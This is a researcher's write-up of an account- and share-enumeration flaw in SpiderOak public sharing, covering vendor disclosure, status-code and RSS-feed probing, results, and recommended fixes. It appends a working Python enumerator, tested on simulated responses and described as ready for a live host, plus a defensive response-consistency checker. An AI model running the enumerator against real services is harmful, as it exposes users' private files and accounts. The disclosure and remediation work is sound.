
Spideroak delete account
About two years ago I did some research on enumerating the content of public shares on both Amazon S3 buckets and MobileMe. At the start of 2012 I started using SpiderOak, which also offers a way to share data with other people, so I decided to have a look at how that worked to see if it could also be enumerated.

To cut a long story short, it could, and at the start of March 2012 I contacted the security team at SpiderOak, giving them the information I'd found and some sample code to show how it worked. They acknowledged the mail and said they would work on a fix.

At the start of April 2012 I was considering giving a talk on the research at BSides London, so I asked SpiderOak when a fix was likely to be in place: I would have liked to present but wouldn't want to reveal anything if a fix was in progress. On the 13th of April I was told that a fix should be in place before BSides and that they would be happy to see the talk. In the end I gave my talk on Breaking in to Security instead and ended up forgetting about SpiderOak.

A week or so ago Rapid7 published their research on Amazon S3 buckets, and with the interest it generated I thought I'd dig out the SpiderOak work and see if it still worked. It does, so here it is.

The enumeration works in two steps: check HTTP status codes to identify valid accounts, then look for RSS feeds to find valid shares.

If you request a share on an account that exists, you get a 200 back even if the share doesn't exist. Only some of the headers from each curl -I capture survive on this page; the status codes are as described in the text. On an account that exists:

    Strict-Transport-Security: max-age=8640000; includeSubDomains
    Set-Cookie: uid=AAAAKlFcqe69ciDRBEYWAg=; expires=Thu, 03-Apr-14 22:15:10 GMT; path=/

But on an account which doesn't exist you get a 404:

    Set-Cookie: uid=AAAAKlFcqia9ciDRBEaQAg=; expires=Thu, 03-Apr-14 22:16:06 GMT; path=/

So you can run through a list of usernames and score a hit for any 200s you get back.

The next step is to enumerate shares. To do this, request the share you want to check and search the page that is returned for an RSS link in its header. All shares, whether they exist or not, have an RSS link in the header, but if you then request the RSS link you get a 200 for valid shares and a 404 for shares which don't exist. For a valid share (200):

    Content-Type: application/atom+xml; charset=utf-8
    Set-Cookie: uid=AAAAKlFcrZ21fSDQBCdjAg=; expires=Thu, 03-Apr-14 22:30:53 GMT; path=/

For a share which doesn't exist (404):

    Set-Cookie: uid=AAAAKlFcrba1fSDQBCd8Ag=; expires=Thu, 03-Apr-14 22:31:18 GMT; path=/

If you look at the RSS feed that you get from a valid share, it contains a list of all the files in the share:

    does_exist: SpiderOak Share Feed by digi_public
    share/digi_public/does_exist/Users/robin/Desktop/does_exist/a_text_file.txt
    share/digi_public/does_exist/Users/robin/Desktop/does_exist/another_file.zip

And that is it: you can read through the RSS file and generate a list of files ready to download.

So what did I find? Unfortunately not that much, although I didn't search that hard. I started with a list of 2268 common names, ran those through and found 615 valid accounts, which I thought was a good start. I then started running those through with lists of common share/folder names. With the help of friends on Twitter I built up a list of 58 potential names (you can get this list from Pastebin). I ran these 58 folders against each of the 615 accounts and came back with 14 hits, which is approximately a 2.3% hit rate. From those 14 hits there were 97 files available. Not massive, but enough to show the process works.

I didn't download any of the files, but from the names most were images, the majority from someone's Christmas party. There was also a Michael Bublé Christmas 2011 album, a CISSP ebook and a video that was probably porn.

I also did some quick searches for some large company names and got hits for the accounts being valid, but didn't find any shares. Just because the names match companies doesn't mean they belong to them, but it could be useful information if a company you are testing happens to have a successful match.

I believe there are a few things which need doing to fix this problem. The first is to fix the actual vulnerability: requesting a share which doesn't exist from an account which does should return a 404, in the same way as requesting a share from an account which doesn't exist. This removes the ability to enumerate accounts on their own and so massively increases the number of requests required to enumerate shares, because every share name has to be tried against every candidate account: 2268 * 58 = 131,544 requests instead of 615 * 58 = 35,670 in this situation.

Along with this, make sure that the headers which are returned match for all invalid requests, down to their order. I've seen situations where two different requests both generate a 404 but one has headers in a different order, or just different headers; differences like this can also be used for enumeration. The same goes for the response body and its length.
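The two-step enumeration described above, as an added example rather than the sample code that was sent to SpiderOak. It runs offline: simulated_fetch stands in for an HTTP client and reproduces only the behaviour reported here (a 200 on any share page of a live account, a 404 otherwise, and a 200 or 404 on the RSS link depending on whether the share exists) using constructed data. The /share/<account>/<share> path layout, the share page HTML, the Atom feed markup and the account, share and probe names are all assumptions.

```python
"""Two-step share enumeration: an HTTP 200 on any share page identifies a live
account, and a 200 on the share's RSS link identifies a live share whose Atom
feed lists the files.

Added example, not the original post's code. `simulated_fetch` is a stand-in
for an HTTP client built from constructed data; the URL layout, page HTML and
feed structure are assumptions.
"""
import re
import xml.etree.ElementTree as ET

ATOM_NS = "http://www.w3.org/2005/Atom"

# Constructed data: accounts that exist and the shares each one has.
SIMULATED_ACCOUNTS = {
    "digi_public": {"does_exist"},
    "acme": set(),          # valid account with no shares (like the company hits)
}


def build_feed(account, share):
    """Constructed Atom feed; entry titles follow the path shape quoted above."""
    base = f"share/{account}/{share}/Users/robin/Desktop/{share}"
    entries = "".join(
        f"<entry><title>{base}/{name}</title></entry>"
        for name in ("a_text_file.txt", "another_file.zip")
    )
    return (f'<feed xmlns="{ATOM_NS}">'
            f"<title>{share}: SpiderOak Share Feed by {account}</title>"
            f"{entries}</feed>")


def simulated_fetch(path):
    """Return (status, body) for an assumed /share/<account>/<share>[/rss] path."""
    m = re.fullmatch(r"/share/([^/]+)/([^/]+)(/rss)?", path)
    if not m:
        return 404, ""
    account, share, want_rss = m.groups()
    if account not in SIMULATED_ACCOUNTS:
        return 404, ""                      # unknown account: 404 on the share page
    if not want_rss:
        # The leak: a share page on a live account is 200 even when the share
        # does not exist, and it always carries an RSS <link>.
        return 200, ('<html><head><link rel="alternate" '
                     f'type="application/atom+xml" href="{path}/rss"></head></html>')
    if share in SIMULATED_ACCOUNTS[account]:
        return 200, build_feed(account, share)
    return 404, ""                          # RSS link of a missing share: 404


RSS_LINK = re.compile(r'<link[^>]*type="application/atom\+xml"[^>]*href="([^"]+)"')


def enumerate_accounts(fetch, names, probe_share="probe"):
    """Step 1: any share page that answers 200 marks the account as valid."""
    return [n for n in names if fetch(f"/share/{n}/{probe_share}")[0] == 200]


def list_files(feed_xml):
    """Pull the entry titles (file paths) out of a share's Atom feed."""
    root = ET.fromstring(feed_xml)
    return [e.findtext(f"{{{ATOM_NS}}}title")
            for e in root.findall(f"{{{ATOM_NS}}}entry")]


def enumerate_shares(fetch, account, share_names):
    """Step 2: follow each share page's RSS link; 200 means the share exists.
    Returns {share_name: [file paths]} for the shares found."""
    found = {}
    for share in share_names:
        status, page = fetch(f"/share/{account}/{share}")
        link = RSS_LINK.search(page) if status == 200 else None
        if link is None:
            continue
        status, feed = fetch(link.group(1))
        if status == 200:
            found[share] = list_files(feed)
    return found


def run(fetch, account_names, share_names):
    """Wordlist x wordlist, the way the 2268 names x 58 folders run was done."""
    return {acct: enumerate_shares(fetch, acct, share_names)
            for acct in enumerate_accounts(fetch, account_names)}


if __name__ == "__main__":
    results = run(simulated_fetch,
                  ["digi_public", "acme", "nobody"],      # constructed wordlist
                  ["does_exist", "photos"])               # constructed wordlist
    for acct, shares in results.items():
        print(acct, shares)
```

Swapping simulated_fetch for a real client that returns (status_code, body) is the only change needed to run it against a live host; the account step needs one request per name and the share step one page request plus one feed request per share name.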

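A check for the second recommendation, added here and not part of the original post: given two responses that should both be "not found", report anything that would let an attacker tell them apart, whether status code, header set, header order or header values. Per-request values such as the uid cookie are compared by name and position only, which is an assumption about what varies legitimately. The sample responses are constructed; only the header names in them come from the captures above.

```python
"""Check that two 'should be invalid' responses are indistinguishable.

Added example, not from the original post. Parses two responses in 'curl -I'
form and lists observable differences. Sample responses are constructed; the
set of headers treated as volatile is an assumption.
"""

# Values that legitimately change per request (the uid cookie and its expiry
# did in the captures above): compare name and position only, not value.
VOLATILE = {"date", "set-cookie", "expires"}


def parse_response(raw):
    """Turn 'HTTP/1.1 404 Not Found' + header lines into (code, [(name, value)])."""
    lines = [line.rstrip("\r") for line in raw.strip().splitlines()]
    code = int(lines[0].split()[1])
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break                           # end of the header block
        name, _, value = line.partition(":")  # first colon only: values hold times
        headers.append((name.strip(), value.strip()))
    return code, headers


def response_differences(raw_a, raw_b):
    """Return a list of observable differences; an empty list means the two
    responses cannot be told apart by status line or headers."""
    code_a, hdr_a = parse_response(raw_a)
    code_b, hdr_b = parse_response(raw_b)
    diffs = []
    if code_a != code_b:
        diffs.append(f"status: {code_a} vs {code_b}")
    names_a = [n.lower() for n, _ in hdr_a]
    names_b = [n.lower() for n, _ in hdr_b]
    if sorted(names_a) != sorted(names_b):
        diffs.append(f"header set: {sorted(set(names_a) ^ set(names_b))}")
    elif names_a != names_b:
        diffs.append(f"header order: {names_a} vs {names_b}")
    for (na, va), (nb, vb) in zip(hdr_a, hdr_b):
        if na.lower() == nb.lower() and na.lower() not in VOLATILE and va != vb:
            diffs.append(f"{na}: {va!r} vs {vb!r}")
    return diffs


# Constructed captures. In this pair the missing-share response on a live
# account carries an HSTS header the missing-account response lacks, and the
# remaining headers are in a different order: both are enumeration signals.
MISSING_ACCOUNT = """HTTP/1.1 404 Not Found
Content-Type: text/html
Set-Cookie: uid=AAAAexample1=; expires=Thu, 03-Apr-14 22:16:06 GMT; path=/
"""
MISSING_SHARE_LEAKY = """HTTP/1.1 404 Not Found
Strict-Transport-Security: max-age=8640000; includeSubDomains
Set-Cookie: uid=AAAAexample2=; expires=Thu, 03-Apr-14 22:15:10 GMT; path=/
Content-Type: text/html
"""
# The fixed form: same status, same headers, same order; only the volatile
# cookie value differs, which the check ignores.
MISSING_SHARE_FIXED = """HTTP/1.1 404 Not Found
Content-Type: text/html
Set-Cookie: uid=AAAAexample3=; expires=Thu, 03-Apr-14 22:30:53 GMT; path=/
"""

if __name__ == "__main__":
    print("leaky:", response_differences(MISSING_ACCOUNT, MISSING_SHARE_LEAKY))
    print("fixed:", response_differences(MISSING_ACCOUNT, MISSING_SHARE_FIXED))
```

Feed it the output of curl -I against a missing account and against a missing share on a known account; an empty list is what the fix should produce. Body length and response time are worth comparing the same way, and are not covered by this check.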